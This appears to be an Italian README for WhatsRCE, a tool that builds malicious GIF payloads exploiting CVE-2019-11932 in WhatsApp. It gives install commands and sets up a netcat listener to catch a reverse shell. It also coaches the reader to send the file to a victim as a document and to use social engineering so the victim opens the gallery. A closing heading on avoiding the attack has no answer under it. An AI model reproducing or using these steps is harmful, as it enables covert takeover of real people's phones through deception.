WhatsRCE
Questo è un generatore automatico di payload per CVE-2019-11932 (Esecuzione di codice remoto su WhatsApp)
- Installazione automatica di GCC (comando innocuo, puoi vedere che è open-source)
- Salvataggio in file .GIF
Come si usa?
sudo apt install git
git clone https://github.com/KeepWannabe/WhatsRCE
cd WhatsRCE && bash start.sh
Come ottenere una shell?
- Devi solo inviare il file .GIF alla vittima COME DOCUMENTO, NON COME IMMAGINE
- E imposta nc / netcat sulla porta che hai configurato negli strumenti WhatsRCE {nc -lnvp tua_porta}
- Puoi usare l'attacco di ingegneria sociale così che le vittime siano attratte ad avviare questo exploit
- Di' alla vittima di aprire la galleria tramite whatsapp e chiedile di inviare qualsiasi foto (non serve, basta che acceda alla galleria, nessun problema) dopo qualche secondo riceverai una connessione shell dalla vittima
oppure guarda questo video
VIDEO DIMOSTRATIVO
https://drive.google.com/file/d/1T-v5XG8yQuiPojeMpOAG6UGr2TYpocIj/view
se il link sopra non è accessibile
https://drive.google.com/open?id=1X9nBlf5oj5ef2UoYGOfusjxAiow8nKEK
Come evitare questo attacco?